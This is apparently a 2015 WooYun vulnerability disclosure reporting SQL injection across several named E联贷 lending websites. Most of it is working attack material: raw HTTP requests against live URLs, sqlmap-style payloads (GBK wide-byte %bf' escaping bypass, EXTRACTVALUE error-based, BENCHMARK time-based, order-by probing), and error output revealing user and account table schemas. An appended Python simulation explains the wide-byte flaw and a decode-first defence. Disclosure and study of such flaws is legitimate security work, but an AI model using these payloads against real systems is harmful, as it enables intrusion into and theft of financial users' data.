
Vulnerability summary

Defect ID: wooyun-2015-0105315

Vulnerability title: SQL injection affecting all E联贷 sites

Related vendor: E联贷

Vulnerability author: 路人甲

Submitted: 2015-04-03 16:48

Fix deadline: 2015-05-18 16:50

Public disclosure: 2015-05-18 16:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Vulnerability status: Vendor could not be contacted, or the vendor actively ignored it

Vulnerability source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-03: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-05-18: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Injection

Detailed description:

So far, every E联贷 website found has an injection vulnerability.

Proof of vulnerability:

http://www.eldzz.com/
http://www.eldzb.com/
http://www.eldqd.com/
http://www.eldqd.net/
http://www.eldshop.com/
Injection 1:
POST http://www.eldzz.com/index.php?user&q=action/login HTTP/1.1
Host: www.eldzz.com
Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.eldzz.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.eldzz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
keywords=admin%bf')&password=admin&submit=%B5%C7+%C2%BC
Place: POST
Parameter: keywords
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: keywords=admin%bf') AND EXTRACTVALUE(4685,CONCAT(0x5c,0x71756b7071,(SELECT (CASE WHEN (4685=4685) THEN 1 ELSE 0 END)),0x71716d6871))-- TVnM&password=admin&submit=%B5%C7 %C2%BC
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [1]:
[*] eldzz
Injection 2:
POST http://www.eldzz.com/index.php?user&q=action/check_valid_user HTTP/1.1
Host: www.eldzz.com
Connection: keep-alive
Content-Length: 67
Accept: text/plain, */*; q=0.01
Origin: http://www.eldzz.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://www.eldzz.com/index.php?user&q=action/reg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
user&q=action/check_valid_user&param=admin@gmail.com%bf'&name=email
Response:
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 16:24:39 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 236
Connection: close
Content-Type: text/html;charset=GB2312
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin@gmail.com縗''' at line 1执行SQL语句错误!select * from dw_user where email='admin@gmail.com縗''
Place: POST
Parameter: param
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment)
Payload: user&q=action/check_valid_user&param=admin@gmail.com%bf' AND 2277=BENCHMARK(5000000,MD5(0x645a6763))#&name=email
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
current database: 'eldzz'
Injection 3:
POST http://www.eldzz.com/index.php?user&q=action/getpwd HTTP/1.1
Host: www.eldzz.com
Connection: keep-alive
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.eldzz.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.eldzz.com/index.php?user&q=action/getpwd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
email=admin%40gmail.cn%bf'&username=admin&valicode=1768
Response:
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 16:33:26 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 599
Connection: close
Content-Type: text/html;charset=GB2312
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin@gmail.cn縗''' at line 6执行SQL语句错误!select p2.name as typename,p2.type,p3.*,p4.*,p5.*,p1.* from `dw_user` as p1
left join `dw_user_type` as p2 on p1.type_id = p2.type_id
left join `dw_user_cache` as p3 on p3.user_id = p1.user_id
left join `dw_account` as p4 on p4.user_id = p1.user_id
left join `dw_userinfo` as p5 on p5.user_id = p1.user_id
where 1=1 and p1.username = 'admin' and p1.email = 'admin@gmail.cn縗''
Injection 4:
http://www.eldshop.com/invest/index.html?city=&use=247'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and p1.use in (247')' at line 9执行SQL语句错误!select count(1) as num from `dw_borrow` as p1 left join `dw_user` as p2 on p1.user_id=p2.user_id left join `dw_user_cache` as uca on uca.user_id=p1.user_id left join `dw_user` as u on u.user_id=uca.kefu_userid left join `dw_credit` as p3 on p1.user_id=p3.user_id left join `dw_credit_rank` as p4 on p3.value<=p4.point2 and p3.value>=p4.point1 left join `dw_userinfo` as p5 on p1.user_id=p5.user_id left join `dw_daizi` as p6 on p1.id=p6.borrow_id where 1=1 and p1.showstate!=1 and p1.id>='17755' and (p1.status=1 or p1.status=3) and p1.use in (247') and p1.use in (247')
Injection 5:
http://www.eldzz.com/tools/index.html?keywords=a&account1=0&account2=&province=&city=1'/**/or/**/1=1--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/**/or/**/1 and p1.account >= 0' at line 9执行SQL语句错误!select count(1) as num from `dw_borrow` as p1 left join `dw_user` as p2 on p1.user_id=p2.user_id left join `dw_user_cache` as uca on uca.user_id=p1.user_id left join `dw_user` as u on u.user_id=uca.kefu_userid left join `dw_credit` as p3 on p1.user_id=p3.user_id left join `dw_credit_rank` as p4 on p3.value<=p4.point2 and p3.value>=p4.point1 left join `dw_userinfo` as p5 on p1.user_id=p5.user_id left join `dw_daizi` as p6 on p1.id=p6.borrow_id where 1=1 and p1.id>='' and (p1.status=1 or p1.status=3) and (p1.name like '%a%' or u.username like '%a%') and p2.city =1'/**/or/**/1 and p1.account >= 0
Removing the single quote gives a normal query result.
Injection 6:
http://www.eldzz.com/bbs/index.html?q=forums&fid=2'/**/and/**/1=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 4执行SQL语句错误!select p1.* from `dw_bbs_topics` as p1 left join dw_bbs_forums as p2 on p2.id = p1.fid left join dw_bbs_posts as p3 on p3.tid = p1.id where p1.id=48'
Removing the single quote gives a normal query result...
Injection 7:
http://www.eldzz.com/bbs/index.html?q=view&tid=48/**/order/**/by/**/100--
Response:
Unknown column '100' in 'order clause'执行SQL语句错误!select p1.* from `dw_bbs_topics` as p1 left join dw_bbs_forums as p2 on p2.id = p1.fid left join dw_bbs_posts as p3 on p3.tid = p1.id where p1.id=48/**/order/**/by/**/100--
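The `%bf'` payloads in injections 1 to 3 work because the application escapes bytes (addslashes-style) while the server reads the SQL literal as GBK: the 0xBF lead byte and the inserted 0x5C backslash merge into one character (the 縗 visible in the error text), and the quote survives to end the string. The Python simulation below is added here and is not part of the report; it assumes a gbk connection charset, touches no database, and shows both the failure and a decode-first escape that rejects the payload (prepared statements with the charset set on the connection remain the proper fix).

```python
# Added simulation (not from the report): why "admin%bf'" defeats byte-wise
# escaping when the SQL literal is parsed as GBK, and a decode-first escape
# that closes the gap. No database is touched; "gbk" is an assumed charset.
from typing import Optional

ESCAPED = b"'\"\\"  # bytes addslashes() prefixes with a backslash (NUL omitted)


def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): charset-unaware."""
    out = bytearray()
    for b in raw:
        if b in ESCAPED:
            out.append(0x5C)  # insert '\' before the byte
        out.append(b)
    return bytes(out)


def live_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes still unescaped once the bytes are decoded the
    way the server decodes them. Under GBK the 0xBF lead byte swallows the
    inserted 0x5C, so the quote ends the SQL literal (the report's bug)."""
    text = escaped.decode(charset, errors="replace")
    live, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a backslash escapes whatever character follows it
            continue
        if text[i] == "'":
            live += 1
        i += 1
    return live


def escape_after_decoding(raw: bytes, charset: str) -> Optional[bytes]:
    """Safer ordering: decode strictly first (a lone 0xBF lead byte is
    rejected), escape characters, then re-encode. None means invalid input."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    escaped = "".join(("\\" + c) if c in "'\"\\" else c for c in text)
    return escaped.encode(charset)


if __name__ == "__main__":
    payload = b"admin\xbf'"  # constructed from the report's keywords=admin%bf'
    print(live_quotes(addslashes(payload), "gbk"))      # 1: quote is live
    print(live_quotes(addslashes(payload), "latin-1"))  # 0: same bytes, single-byte charset
    print(escape_after_decoding(payload, "gbk"))        # None: rejected before SQL
```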

Fix recommendation:

Filter input.

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.